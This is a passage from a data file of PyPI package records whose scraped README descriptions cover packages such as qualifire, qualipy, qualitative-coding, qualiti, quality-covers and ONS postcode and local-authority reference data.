BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qualified", "pacakge-description": "No description available on PyPI."} +{"package": "qualified-name-extractor", "pacakge-description": "extract qualified name"} +{"package": "qualifier", "pacakge-description": "qualifierBuild StatusTraivs:Circleci:Description:A simple python project used for updating the qualifier part of the version for python projects.Expectation:This project expects setup.py of this formatfromsetuptoolsimportsetup__QUALIFIER__=\"\"setup(name=\"qualifier\",version=\"1.0.0\"+__QUALIFIER__,...)On running the commandupdate_qualifierwhich is provided on installing this project as shell command,__QUALIFIER__would be update based the rules.Rules:If the HEAD is tagged and the branch is master then__QUALIFIER__will not be updatedIf the HEAD is not tagged and the branch is master then__QUALIFIER__will be updated torcIf the HEAD is not tagged and the branch is not master then__QUALIFIER__will be updated to.dev"} +{"package": "qualifire", "pacakge-description": "qualifireQualifire Python SDKVery first stepsInitialize your codeInitializegitinside your repo:cdqualifire&&gitinitIf you don't havePoetryinstalled run:makepoetry-downloadInitialize poetry and installpre-commithooks:makeinstall\nmakepre-commit-installRun the codestyle:makecodestyleUpload initial code to GitHub:gitadd.\ngitcommit-m\":tada: Initial commit\"gitbranch-Mmain\ngitremoteaddoriginhttps://github.com/qualifire-dev/qualifire.git\ngitpush-uoriginmainSet up botsSet upDependabotto ensure you have the latest dependencies.Set upStale botfor automatic issue closing.PoetryWant to know more about Poetry? Checkits documentation.Details about PoetryPoetry'scommandsare very intuitive and easy to learn, like:poetry add numpy@latestpoetry run pytestpoetry publish --buildetcBuilding and releasing your packageBuilding a new version of the application contains steps:Bump the version of your packagepoetry version . You can pass the new version explicitly, or a rule such asmajor,minor, orpatch. For more details, refer to theSemantic Versionsstandard.Make a commit toGitHub.Create aGitHub release.And... publish \ud83d\ude42poetry publish --build\ud83c\udfaf What's nextWell, that's up to you \ud83d\udcaa\ud83c\udffb. I can only recommend the packages and articles that helped me.Typeris great for creating CLI applications.Richmakes it easy to add beautiful formatting in the terminal.Pydantic\u2013 data validation and settings management using Python type hinting.Logurumakes logging (stupidly) simple.tqdm\u2013 fast, extensible progress bar for Python and CLI.IceCreamis a little library for sweet and creamy debugging.orjson\u2013 ultra fast JSON parsing library.Returnsmakes you function's output meaningful, typed, and safe!Hydrais a framework for elegantly configuring complex applications.FastAPIis a type-driven asynchronous web framework.Articles:Open Source Guides.A handy guide to financial support for open sourceGitHub Actions Documentation.Maybe you would like to addgitmojito commit names. This is really funny. \ud83d\ude04\ud83d\ude80 FeaturesDevelopment featuresSupports forPython 3.8and higher.Poetryas the dependencies manager. See configuration inpyproject.tomlandsetup.cfg.Automatic codestyle withblack,isortandpyupgrade.Ready-to-usepre-commithooks with code-formatting.Type checks withmypy; docstring checks withdarglint; security checks withsafetyandbanditTesting withpytest.Ready-to-use.editorconfig,.dockerignore, and.gitignore. You don't have to worry about those things.Deployment featuresGitHubintegration: issue and pr templates.Github Actionswith predefinedbuild workflowas the default CI/CD.Everything is already set up for security checks, codestyle checks, code formatting, testing, linting, docker builds, etc withMakefile. More details inmakefile-usage.Dockerfilefor your package.Always up-to-date dependencies with@dependabot. You will onlyenable it.Automatic drafts of new releases withRelease Drafter. You may see the list of labels inrelease-drafter.yml. Works perfectly withSemantic Versionsspecification.Open source community featuresReady-to-usePull Requests templatesand severalIssue templates.Files such as:LICENSE,CONTRIBUTING.md,CODE_OF_CONDUCT.md, andSECURITY.mdare generated automatically.Stale botthat closes abandoned issues after a period of inactivity. (You will onlyneed to setup free plan). Configuration ishere.Semantic Versionsspecification withRelease Drafter.Installationpipinstall-Uqualifireor install withPoetrypoetryaddqualifireMakefile usageMakefilecontains a lot of functions for faster development.1. Download and remove PoetryTo download and install Poetry run:makepoetry-downloadTo uninstallmakepoetry-remove2. Install all dependencies and pre-commit hooksInstall requirements:makeinstallPre-commit hooks coulb be installed aftergit initviamakepre-commit-install3. CodestyleAutomatic formatting usespyupgrade,isortandblack.makecodestyle# or use synonymmakeformattingCodestyle checks only, without rewriting files:makecheck-codestyleNote:check-codestyleusesisort,blackanddarglintlibraryUpdate all dev libraries to the latest version using one comandmakeupdate-dev-deps4. Code securitymakecheck-safetyThis command launchesPoetryintegrity checks as well as identifies security issues withSafetyandBandit.makecheck-safety5. Type checksRunmypystatic type checkermakemypy6. Tests with coverage badgesRunpytestmaketest7. All lintersOf course there is a command torulerun all linters in one:makelintthe same as:maketest&&makecheck-codestyle&&makemypy&&makecheck-safety8. Dockermakedocker-buildwhich is equivalent to:makedocker-buildVERSION=latestRemove docker image withmakedocker-removeMore informationabout docker.9. CleanupDelete pycache filesmakepycache-removeRemove package buildmakebuild-removeDelete .DS_STORE filesmakedsstore-removeRemove .mypycachemakemypycache-removeOr to remove all above run:makecleanup\ud83d\udcc8 ReleasesYou can see the list of available releases on theGitHub Releasespage.We followSemantic Versionsspecification.We useRelease Drafter. As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you\u2019re ready. With the categories option, you can categorize pull requests in release notes using labels.List of labels and corresponding titlesLabelTitle in Releasesenhancement,feature\ud83d\ude80 Featuresbug,refactoring,bugfix,fix\ud83d\udd27 Fixes & Refactoringbuild,ci,testing\ud83d\udce6 Build System & CI/CDbreaking\ud83d\udca5 Breaking Changesdocumentation\ud83d\udcdd Documentationdependencies\u2b06\ufe0f Dependencies updatesYou can update it inrelease-drafter.yml.GitHub creates thebug,enhancement, anddocumentationlabels for you. Dependabot creates thedependencieslabel. Create the remaining labels on the Issues tab of your GitHub repository, when you need them.\ud83d\udee1 LicenseThis project is licensed under the terms of theMITlicense. SeeLICENSEfor more details.\ud83d\udcc3 Citation@misc{qualifire,author={qualifire-dev},title={Qualifire PYthon SDK},year={2023},publisher={GitHub},journal={GitHub repository},howpublished={\\url{https://github.com/qualifire-dev/qualifire}}}CreditsThis project was generated withpython-package-template"} +{"package": "qualifyzedatautils", "pacakge-description": "No description available on PyPI."} +{"package": "qualifyzetest", "pacakge-description": "No description available on PyPI."} +{"package": "qualimens", "pacakge-description": "No description available on PyPI."} +{"package": "qualipy", "pacakge-description": "QualiPyQualiPy is a framework for assisting with the automated testing process. Qualipy is not meant to replace pytest, behave, or other testing frameworks. Instead, it is meant to augment the process to provider further automation. It can be configured based on the needs of the project and the availablility of other technologies.QualiPy features include:Exporting feature files from JIRA for progression and regression testingUploading test results to JIRASupport for custom project management, authentication, and testing pluginsComing Soon:Moving user stories based on the outcome of the testsLoading test data to be used during the testing processCleaning up the test data after the testing has completedData management across steps and scenariosTest PluginsQualiPy is built to use multiple testing frameworks via plugins. Currently, QualiPy supports the behave framework out of the box for business-driven development.Project Management PluginsLike the testing plugins, QualiPy can also use multiple project management software suites (such as JIRA) via plugins.AuthenticationIn most cases, authentication needs to happen in order to interact with project management software suites. This interaction can use certificates, API keys, or simple username/password combinations. The difficult part is how to secure the credentials. For starters, a keyring authenticator is implemented that just uses the keyring functionality for the underlying OS.Initial SetupIn order to test using JIRA, you must have a running JIRA instance.Create a test project that uses behave to run tests from feature filesCreate and activate a virtual environment (optional)Install QualiPy (pip install qualipy)Execute QualiPy (python -m qualipy)QualiPy looks forqualipy.yamlin the current directory. If that is not found, then default configuration settings are used. Additionally, other YAML config files can be used by including the--config-filecommand line argument.QualiPy assumes that the feature files are located in thefeaturesdirectory in the current working directory. This can be changed with the--features-dircommand line argument."} +{"package": "qualisicherung", "pacakge-description": "Add a short description here!DescriptionA longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 3.2.3. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qualisys", "pacakge-description": "Load data from a .txt file exported from QTM intopandas:pip install qualisysIn[1]:fromqualisysimportload_qtm_dataIn[2]:data,metadata=load_qtm_data('example_data.txt')In[3]:metadataOut[3]:{'analog_frequency':0,'description':'--','events':[],'no_of_frames':720,'pc_on_time':912.56663253,'no_of_cameras':7,'marker_names':['RIGHT_KNEE','right_ankle'],'frequency':120,'no_of_markers':2,'no_of_analog':0,'data_included':'3D','time_stamp':numpy.datetime64('2014-06-17T08:53:44-0400')}In[4]:dataOut[4]:Dimensions:2(items)x720(major_axis)x3(minor_axis)Itemsaxis:RIGHT_KNEEtoright_ankleMajor_axisaxis:0.00833to6.0Minor_axisaxis:xtozIn[5]:data['right_ankle'].head()Out[5]:dimxyzt0.008331501.1022073.985102.8150.016671501.1872074.183103.0580.025001501.0522073.905102.7750.033331501.5572073.970103.1950.041671501.4252073.629102.974"} +{"package": "qualitative-coding", "pacakge-description": "Qualitative CodingQualitative coding for computer scientists.Qualitative coding is a form of feature extraction in which text (or images,\nvideo, etc.) is tagged with features of interest. Sometimes the codebook is\ndefined ahead of time, other times it emerges through multiple rounds of coding.\nFor more on how and why to use qualitative coding, see Emerson, Fretz, and\nShaw'sWriting Ethnographic Fieldnotesor Shaffer'sQuantitative\nEthnography.Most of the tools available for qualitative coding and subsequent analysis were\ndesigned for non-programmers. They are GUI-based, proprietary, and don't expose\nthe data in well-structured ways. Concepts from computer science, such as trees,\nsorting, and filtering, could also be applied to qualitative coding analysis if\nthe interface supported it. Furthermore, a command-line based tool can be\ncombined with other utilities into flexible pipelines.Qualitative Coding, orqc, was designed to address these issues. I have usedqcas a primary coding tool in aSIGCSE\npaperon\npackaging and releasing a stable version was my own dissertation work.qcis in active use on forthcoming publications and receives regular updates\nas we need new features.LimitationsDue to its nature as a command-line program,qcis only well-suited to coding textual data.qcuses line numbers as a fundamental unit. Therefore, it requires text files in your corpus to be\nhard-wrapped at 80 characters. Thecorpus importtask can handle this for you.Coding is done in a two-column view in a variety of supported editors, including\nVisual Studio Code, vim, and emacs. If you are not used to using a text editor,\nor if you prefer a more graphical coding experience,qcmight not be the best option.Installationpip install qualitative-codingSetupChoose a working directory for your project. Runqc init -y. This will createsettings.yamlwith the default settings, and set up the required files\nand directories for you. (Visual Studio Code is the default editor.)UsageWorkflowqcis designed to give you a powerful terminal-based interface. The general\nworkflow is to usecodeto apply qualitative codes to your text files. As you\ngo, you will start to have ideas about the meanings and organization of your\ncodes. Usememoto capture these.Once you finish a round of coding, it's time to reorganize your codes. Editcodebook.yaml, grouping the flat list of codes into a hierarchy.\nUsecodes statsto see the distribution of your codes.\nUsecodes renameif you want to rename existing codes.After you finish coding, you may want to use your codes for analysis. Tools\nare provided for viewing statistics, cross-tabulation, and examples of codes,\nwith many options for selecting and filtering at various units of analysis.\nResults can be exported to CSV for downstream analysis.The--coderargument supports keeping track of multiple coders on a project,\nand there are options to filter on coder where relevant. More analytical tools,\nsuch as inter-rater reliability, are coming.TutorialCreate a new directory somewhere. We will create a virtual environment, intstallqc, and download some sample text from Wikipedia.$ python3 -m venv env\n$ source env/bin/activate\n$ pip install qualitative-coding\n$ qc init -y\n$ curl -o what_is_coding.txt \"https://en.wikipedia.org/w/index.php?title=Coding_%28social_sciences%29&action=raw\"\n$ qc corpus import what_is_coding.txtNow we're ready to start coding. This next command will open a split-window session in\nyour editor of choice; add comma-separated codes to the blank file on the right.\nOnce you've added some codes, we can analyze and refine them.$ qc code chris\n$ qc codebook\n$ qc codes list\n- a_priori\n- analysis\n- coding_process\n- computers\n- errors\n- grounded_coding\n- themesNow that we have coded our corpus (consisting of a single document), we should\nthink about whether these codes have any structure. Re-organize some of your\ncodes incodebook.yaml. When you finish, runcodebookagain. It will go\nthrough your corpus and add any missing codes.$ qc codes list\n- analysis\n- coding_process\n - a_priori\n - grounded_coding\n- computers\n- errors\n- themesI decided to group a priori coding and grounded coding together under coding\nprocess. Let's see some statistics on the codes:$ qc codes stats\nCode Count\n------------------ -------\nanalysis 2\ncoding_process 7\n. a_priori 2\n. grounded_coding 2\ncomputers 2\nerrors 1\nthemes 2statshas lots of useful filtering and formatting options. For example,qc codes stats --pattern wiki --depth 1 --min 10 --format latexwould only consider files\nhaving \"wiki\" in the filename. Within these files, it would show only\ntop-level categories of codes having at least ten instances, and would output a\ntable suitable for inclusion in a LaTeX document. Use--helpon any command to\nsee available options.Next, we might want to see examples of what we have coded.$ qc codes find analysis\nShowing results for codes: analysis\n\nwhat_is_coding.txt (2)\n================================================================================\n\n[0:3]\nIn the [[social science|social sciences]], '''coding''' is an analytical process | analysis\nin which data, in both [[quantitative research|quantitative]] form (such as | \n[[questionnaire]]s results) or [[qualitative research|qualitative]] form (such | \n\n[52:57]\nprocess of selecting core thematic categories present in several documents to | \ndiscover common patterns and relations.Grbich, Carol. (2013). \"Qualitative | \nData Analysis\" (2nd ed.). The Flinders University of South Australia: SAGE | analysis\nPublications Ltd. | \n |Again, there are lots of options for filtering and viewing your coding. At some\npoint, you will probably want to revise your codes. You can easily rename a\ncode, or collapse codes together, with therenamecommand. This updates your\ncodebook as well as in all your code files.$ qc codes rename grounded_coding groundedAt this point, you are starting to realize some of the deeper themes running\nthrough your corpus. Capturing these in an \"integrative memo\" is an important\npart of qualitative coding.memowill open a preformatted document for you in vim.$ qc memo chris --message \"Thoughts on coding process\"Congratulations! You have finished the first round of coding. Before you move\non, this would be an excellent time to check your files into version control.\nI hope you findqcto be powerful and efficient; it's worked for me!-Chris ProctorCommandsUse--helpfor a full list of available options for each command.initInitializes a new coding project. Ifsettings.yamlis missing, writes the settings\nfile with default values. Make any desired edits, and then runqc initagain.\nYou can skip this step by passing--accept-defaults(-y) to the first\ninvocation ofqc init. It is safe to re-runqc init.$ qc initcheckChecks that all required files and directories are in place.$ qc checkcodeOpens a split-screen vim window with a corpus file and the corresponding code\nfile. The name of the coder is a required positional argument.\nAfter optionally filtering using common options (below), select a document with\nno existing codes (for this coder) using--first(-1) or--random(-r)$ qc code chris -1Save and close your editor when you finish. In the unlikely event that your editor\ncrashes or your battery dies before you finish coding, your saved changes are\npersisted incodes.txt. Runqc code --recoverto resume the coding session.codebook (cb)Ensures that all codes in the project are included in the codebook. (New codes are\nadded automatically, but if you accidentally delete some while editing the codebook,qc codebookwill replace them.)$ qc codebookcodersList all coders in the current project.memoOpens your default editor to write a memo, optionally passing--message(-m)\nas the title of the memo. Use--list(-l) to list all memos.$ qc memo -m \"It's all starting to make sense...\"upgradeUpgrade aqcproject from a prior version ofqc.versionShow the current version ofqc.Corpus commandsThe following commands are grouped underqc corpus.corpus listList all files in the corpus.corpus importImport files into the corpus, copying source files intocorpus, formatting them\n(see options), and registering them in the database. Individual files can be imported,\nor directories can be recursively imported using--recursive(-r).$ qc corpus import transcripts --recursiveIf you want to import files into a specific subdirectory within thecorpus, use--corpus-root(-c). For example, if you wanted to import an additional\ntranscript after importing the transcripts directory, you could run:$ qc corpus import follow_up.txt --corpus-root transcriptsSeveral importers are available to format files, and can be specified using--importer(-i). The default importer,pandoc, usesPandocto convert files into plain-text, and then hard-wrap\nthem at 80 characters.verbatimimports text files without making any changes.\nFuture importers will include text extraction from PDFs and automatic transcription of\naudio files.Codes commandsThe following commands are grouped underqc code.codes list (ls)Lists all the codes currently in the codebook.$ qc list --expandedcodes renameGoes through all the code files and replaces one or more codes with another.\nRemoves the old codes from the codebook.$ qc rename humorous funy funnny funnycodes findDisplays all occurences of the provided code(s).$ qc find math science artcodes statsDisplays frequency of usage for each code. Note that counts include all usages of children.\nList code names to show only certain codes. In addition to the common options below,\ncode results can be filtered with--max, and--min.$qc stats --recursive-codes --depth 2codes crosstab (ct)Displays a cross-tabulation of code co-occurrence within the unit of analysis,\nas counts or as probabilities (--probs,-0). Optionally use a compact\n(--compact,-z) output format to display more columns.\nIn the future, this may also include odds ratios.$qc crosstab planning implementation evaluation --recursive-codes --depth 1 --probsCommon OptionsFiltering the corpus--patternpattern(-p): Only include corpus files and their codes which match\n(glob-style)pattern.--filenamesfilepath(-f): Only include corpus files listed infilepath(one per line).Filtering code selectioncode[codes]: Many commands have an optional positional argument in which\nyou may list codes to consider. If none are given, the root node in the tree\nof codes is assumed.--codercoder(-c): Only include codes entered bycoder(if you\nuse different names for different rounds of coding, you can also use this to\nfilter by round of coding).--recursive-codes(-r): Include children of selected codes.--depthdepth(-d): Limit the recursive depth of codes to select.--unitunit(-n): Unit of analysis for reporting. Currently\n\"line\", \"paragraph\", and \"document\" are supported. Paragraphs are delimted\nby blank lines.--recursive-counts(-a): When counting codes, also count instances of\ncodes' children. In contrast to--recursive-codes, which controls which\ncodes will be reported, this option controls how the counting is done.Output and formatting--formatformat(-m): Formatting style for output table. Supported\nvalues include \"html\", \"latex\", \"github\", andmany more.--expanded(-e): Show names of codes in expanded form (e.g.\n\"coding_process:grounded\")--outfileoutfile(-o): Save tabular results to a csv file instead\nof displaying."} +{"package": "quali-testing-helpers", "pacakge-description": "UNKNOWN"} +{"package": "qualiti", "pacakge-description": "Qualiti.ai Python Tools and Package\ud83d\udd17 Qualiti.aiis a very powerful paid platform. This repo is calledqualitibut is a free, open-source Python Package and Command Line Interface (CLI) for you to build your own automated pipelines using AI and see examples of what can be done with AI.This package provides easy-to-use tools that can benefit developers and testers! Just take a look below to see what's available.RequirementsInstallationToolsConfigurationAttributerRequirements\ud83d\udc0d Python3.8.12or higher\ud83d\udce6Poetryas package manager if you are contributingHaving access to both allows you to use all features and examples, so note which you'll need:\ud83d\udd11 Access toOpenAIvia API Key\ud83d\udd11 Access to\ud83e\udd17 HuggingFacevia Access TokenInstallationThis project currently supports these models and providers, but you must have access to them:OpenAI (gpt-3.5-turbois the default model)Installqualitiwith your favorite package manager:pipinstallqualitiSet up the model and/or provider you want to use.OpenAISet yourOPENAI_API_KEYEnvironment Variable. You can use thequaliti set-envcommand if needed:qualiticonfset-envOPENAI_API_KEY\ud83d\udca1 You can also use a.envfile or manage Environment Variables your own way! Use theexample.envtemplate as an example\ud83e\udd17 HuggingFaceSet yourHUGGINGFACE_ACCESS_TOKENEnvironment Variable. You can use thequaliti set-envcommand if needed:qualiticonfset-envHUGGINGFACE_ACCESS_TOKEN\ud83d\udca1 Make sure tosourcethe config file or restart the Terminal to register the changesThen start usingqualitiin the CLI or as a package in your project:qualiti--helpfromqualitiimportaiPROMPT=\"\"\"Write a one-sentence greeting as a{0}\"\"\"openai_response=ai.get_completion(PROMPT.format(\"pirate\"))ConfigurationThis tool allows you to Set and Get key-value pairs in your Environment Variables or thequaliti.conf.json.\ud83d\udca1 This is shown in Step 2 of theInstallationsectionUsagequaliticonf[COMMAND][OPTIONS]ExamplesThis is helpful if you know that your elements are in specific files. This makes tools likeAttributerfaster and cheaper since the AI will only look at files that you care about.For example, in Angular, you may know that your HTML only exists in these file patterns:*.component.ts*.component.htmlWe can set theGLOB_PATTERNvalue to only look for component files.qualiticonfset-confGLOB_PATTERN\"*.component.*\"\ud83d\udca1 See the Pythonglob and fnmatchdocs for details on how to create glob patternsAttributerUse AI to auto-adddata-testidattributes to HTML code.\ud83e\udd16 Usagequalitiattrtestid[PATH][OPTIONS]\ud83d\udca1 You can enter a path to a single file or to a directory.IfPATHis a directory, it will recursively look forall supported filesin that directory and its subdirectories.Seequaliti.conf.jsonfor the default supported file types \ud83d\udc40You can update this list usingset-conf:qualiticonfset-confSUPPORTED_FILES\"[.html, .tsx]\"Examples:# filequalitiattrtestidexamples/StoryView.tsx# directoryqualitiattrtestidexamples/SubComponents\ud83e\udd15 ProblemAlthough it's \"best practice\" for Web Pages to have dedicated attributes for Test Automation and Accessibility (a11y), it seems to be an afterthought and is not commonly followed.\u274c This makes the websiteinaccessiblefor a large group of people (ie screen readers, keyboard navigation)\u274c This makes it difficult to design and create Test Automation for the UI (ie component, end-to-end)Ideally, developers would design their UI and components with these attributes in mindas they codesince adding them is simple -- especially with a properDesign System-- but imagine a developer inheriting an existing project because they're a new hire, moving teams, or jumping into a project to help out. Spending the time and energy to do all of this manually isn't as simple:Find the appropriate files (could be dozens or hundreds!)Locate the relevant elements in each fileAdd these attributes with helpful names for each element\u2705 SolutionUsing AI, we can do all 3 steps automatically!Provide the file(s) like afilename.tsxor a folder like/ComponentsAI adds adata-testidto each relevant elementThe new file is saved and can now be compared to the original in case the dev wants to make any changes\ud83d\udca1 Theoretically, this approach should work for any Web Framework like Angular, React, Vue, etc!\ud83d\udcad ConsiderationsSeeattributer.pyfor the prompt and commands used.OpenAI ain't free, so be cognizant of how many files you target since each file will invoke the AIUsegitso you get a diff before you push the updated files."} +{"package": "qualitube", "pacakge-description": "No description available on PyPI."} +{"package": "quality", "pacakge-description": "No description available on PyPI."} +{"package": "quality-assurance-data", "pacakge-description": "quality-assurance-dataQuality Assurance data and machine learning version 0.0.1Quality assurance (QA) data and machine learning are essential components in the development and maintenance of machine learning models, particularly in open-source projects hosted on platforms like GitHub. Quality assurance in this context refers to the process of ensuring that the data used to train, validate, and test machine learning models meets specific quality standards. This is crucial in order to build models that are accurate, reliable, and robust.Here are some key aspects to consider when dealing with quality assurance data in machine learning projects:Data collection and preprocessing:Ensure that the data collected is representative of the problem you're trying to solve. Be mindful of potential biases and avoid using low-quality or irrelevant data. Preprocessing involves cleaning, transforming, and normalizing the data so that it's suitable for training machine learning models.Data labeling:In supervised learning, data labeling is a critical step that involves annotating the input data with corresponding output labels. It's important to maintain high-quality labels, as incorrect or inconsistent labeling can lead to poor model performance. In open-source projects, data labeling might involve collaboration among multiple contributors, so establishing clear guidelines and maintaining consistency is key.Data splitting:Split your dataset into training, validation, and test sets to evaluate the performance of your model. This allows you to assess how well the model generalizes to unseen data and helps prevent overfitting.Feature engineering:Select the most relevant features or create new ones to improve the performance of your model. This process can be iterative and requires a deep understanding of the problem domain.Model evaluation:Use appropriate evaluation metrics to measure the performance of your machine learning model. This will help you identify potential issues and areas for improvement. In open-source projects, it's helpful to set up automated pipelines for model evaluation to ensure consistent quality.Continuous improvement and monitoring:Continuously monitor the performance of your model, particularly when new data becomes available. Regularly retrain your model and update it to maintain its performance and relevance. In a GitHub context, this might involve using tools like GitHub Actions to automate the process.Documentation and transparency:Proper documentation is crucial for open-source projects. Ensure that the process of data collection, preprocessing, labeling, and model training is well-documented so that others can understand, contribute to, and replicate your work.In summary, quality assurance data is vital for the success of machine learning projects, especially in open-source environments like GitHub. Ensuring high-quality data and following best practices can lead to more accurate and reliable machine learning models."} +{"package": "quality-checks", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quality-control", "pacakge-description": "Quality ControlComing Soon"} +{"package": "quality-covers", "pacakge-description": "Quality coversQuality covers is a pattern mining algorithm.Installpip3install--upgradequality_coversTransactional fileIf your file looks like thischess.dat:1 3 5 7 10 \n1 3 5 7 10 \n1 3 5 8 9 \n1 3 6 7 9 \n1 3 6 8 9orP30968\nP48551 P17181\nP05121 Q03405 P00747 P02671\nQ02643\nP48551 P17181useimportquality_coversquality_covers.run_classic_size(\"chess.dat\",False)Binary fileIf your file looks like thischess.data:1 0 1 0 1 0 1 0 0 1\n1 0 1 0 1 0 1 0 0 1\n1 0 1 0 1 0 0 1 1 0\n1 0 1 0 0 1 1 0 1 0\n1 0 1 0 0 1 0 1 1 0useimportquality_coversquality_covers.run_classic_size(\"chess.data\",True)Output of the functionsThe functions will create two files in current directory:chess.data.out: the result filechess.data.clock: information about time executionExtract binary matricesYou can obtain binary matrices by callingextract_binary_matriceson the output filequality_covers.extract_binary_matrices('chess.data.out')Optional argumentsThreshold coverageYou can provide a threshold to the coverage.# 60% of coveragequality_covers.run_classic_size(\"chess.data\",True,0.6)MeasuresYou can also ask for information about measures:frequencymonocleseparationobject uniformityquality_covers.run_classic_size(\"chess.data\",True,0.6,True)3,4,9 ; 4,5,6,7,8#Object Uniformity=0.81944; Monocole=91.00000; Frequency=0.33333; Separation=0.48387\n2,9 ; 1,3,7#Object Uniformity=0.68750; Monocole=28.00000; Frequency=0.22222; Separation=0.27273\n1,6,9 ; 2,7#Object Uniformity=0.63889; Monocole=28.00000; Frequency=0.33333; Separation=0.31579\n# Mandatory: 0\n# Non-mandatory: 3\n# Total: 3\n# Coverage: 25/38(65.78947%)\n# Mean frequency: 0.29630\n# Mean monocole: 49.00000\n# Mean object uniformity: 0.71528\n# Mean separation: 0.35746Different algorithmsThere are currently four different algorithms:run_classic_sizerun_approximate_sizerun_fca_cemb_with_mandatoryrun_fca_cemb_without_mandatoryExamplesTransactional file with 80% coverage and measures information with approximate size algorithmData file1 3 5 7 10 \n1 3 5 7 10 \n1 3 5 8 9 \n1 3 6 7 9 \n1 3 6 8 9 \n1 4 5 7 10 \n1 4 5 7 10 \n1 4 5 8 9 \n1 4 6 7 9 \n1 4 6 8 9 \n2 3 5 7 10 \n2 3 5 7 10 \n2 3 5 8 9 \n2 3 6 7 9 \n2 3 6 8 9 \n2 4 5 7 10 \n2 4 5 7 10 \n2 4 5 8 9 \n2 4 6 7 9 \n2 4 6 8 9Python commandsimportquality_coversquality_covers.run_approximate_size(file.data', True, 0.8, True)Results file.data.out1,2,6,7,11,12,16,17 ; 5,7,10#Object Uniformity=0.60000; Monocle=648.00000; Frequency=0.40000; Separation=0.50000\n4,5,9,10,14,15,19,20 ; 9,6#Object Uniformity=0.40000; Monocle=352.00000; Frequency=0.40000; Separation=0.36364\n3,5,8,10,13,15,18,20 ; 8,9#Object Uniformity=0.40000; Monocle=352.00000; Frequency=0.40000; Separation=0.36364\n11,12,13,14,15,16,17,18,19,20 ; 2#Object Uniformity=0.20000; Monocle=228.00000; Frequency=0.50000; Separation=0.20000\n6,7,8,9,10,16,17,18,19,20 ; 4#Object Uniformity=0.20000; Monocle=258.00000; Frequency=0.50000; Separation=0.20000\n1,2,3,4,5,11,12,13,14,15 ; 3#Object Uniformity=0.20000; Monocle=258.00000; Frequency=0.50000; Separation=0.20000\n# Mandatory: 0\n# Non-mandatory: 6\n# Total: 6\n# Coverage: 82/100(82.00000%)\n# Mean frequency: 0.45000\n# Mean monocle: 349.33334\n# Mean object uniformity: 0.33333\n# Mean separation: 0.30455Extract binary matricesimportquality_coversquality_covers.extract_binary_matrices('file.data.out')Result binary matrices extent1 0 0 0 0 1\n1 0 0 0 0 1\n0 0 1 0 0 1\n0 1 0 0 0 1\n0 1 1 0 0 1\n1 0 0 0 1 0\n1 0 0 0 1 0\n0 0 1 0 1 0\n0 1 0 0 1 0\n0 1 1 0 1 0\n1 0 0 1 0 1\n1 0 0 1 0 1\n0 0 1 1 0 1\n0 1 0 1 0 1\n0 1 1 1 0 1\n1 0 0 1 1 0\n1 0 0 1 1 0\n0 0 1 1 1 0\n0 1 0 1 1 0\n0 1 1 1 1 0Result binary matrices extentThe first line is the name of the column5 7 10 9 6 8 2 4 3\n1 1 1 0 0 0 0 0 0\n0 0 0 1 1 0 0 0 0\n0 0 0 1 0 1 0 0 0\n0 0 0 0 0 0 1 0 0\n0 0 0 0 0 0 0 1 0\n0 0 0 0 0 0 0 0 1More infoPaper associatedTo comeResearch labhttp://www.ciad-lab.fr/More tools about association ruleshttps://marm.checksem.fr/api/ui/https://app.marm.checksem.fr/https://quality-cover.checksem.fr/api/uiAuthorsAmira Mouakher (amira.mouakher@u-bourgogne.fr)\nNicolas Gros (nicolas.gros01@u-bourgogne.fr)\nSebastien Gerin (sebastien.gerin@sayens.fr)"} +{"package": "quality-estimation", "pacakge-description": "quality-estimation"} +{"package": "qualityface", "pacakge-description": "Quality Face model which decides how suitable of an input face for face recognition system"} +{"package": "qualityforward", "pacakge-description": "This is python library for QualityForward API. QualityForward is cloud based test management service."} +{"package": "quality-lac-data-ref-authorities", "pacakge-description": "Quality LAC Data Reference - Local Authority DataThis is a redistribution of the ONS dataset onLower Tier Local Authority to\nUpper Tier Local Authority (April 2021) Lookup in England and Walesshaped\nto be used in the Quality Lac Data project.This repository contains pypi and npm distributions of\nsubsets of this dataset as well as the scripts to\ngenerate them from source.Source: Office for National Statistics licensed under the Open Government Licence v.3.0Read more about this dataset here:https://geoportal.statistics.gov.uk/datasets/ons::lower-tier-local-authority-to-upper-tier-local-authority-april-2021-lookup-in-england-and-wales/aboutRegular updatesWhen a new authority distribution is available, download it and add it to the source folder and\nat the same time delete the existing file from this location. There can only be one file\nin the source folder at a time.After updating the sources, run the script found inbin/generate-output-files.pyto\nregenerate the output file.Commit everything to GitHub. If ready to make a release, make sure to update the version inpyproject.toml, push to GitHub and then create a GitHub release. TheGitHub Actionwill then create the distribution files and\nupload toPyPI.Release naming should follow a pseudo-semantic versioningformat:... Alpha and beta releases can be flagged by appending-alpha.and-beta..For example, the April 2021 release is named2021.4with the associated tagv2021.4."} +{"package": "quality-lac-data-ref-postcodes", "pacakge-description": "Quality LAC Data Reference - PostcodesThis is a redistribution of theONS Postcode Directoryshaped\nto be used in the Quality Lac Data project.This repository contains PyPI and npm distributions of\nsubsets of this dataset as well as the scripts to\ngenerate them from source.Source: Office for National Statistics licensed under the Open Government Licence v.3.0Read more about this dataset here:https://geoportal.statistidcs.gov.uk/datasets/ons::ons-postcode-directory-august-2021/aboutTo keep distribution small, only pickled dataframes compatible\nwith pandas 1.0.5 are included. This will hopefully change\nonce we figure out how to do different versions as extras.As pickle is inherently unsafe, the SHA-512 checksum for each file\nis included inhashes.txt. This\nfile is signed withthis key.When downloading from PyPI, specify the environment variableQLACREF_PC_KEYto either be the public key itself, or a path\nto where it can be loaded from. The checksums are then verified\nand each file checked before unpickling.Regular updatesWhen a new postcode distribution is available, download it and add it to the source folder and\nat the same time delete the existing file from this location. There can only be one file\nin the source folder at a time.After updating the postcode sources, run the script found inbin/generate-output-files.pyto\nregenerate the output files for each letter of the alphabet. These end up in the\nqlacref_postcodes directory.To sign the postcodes, you need the distribution private key. Run the scriptbin/sign-files.pyto\ncreate the signed checksum file.Commit everything to GitHub. If ready to make a release, make sure to update the version inpyproject.toml, push to GitHub and then create a GitHub release. TheGitHub Actionwill then create the distribution files and\nupload 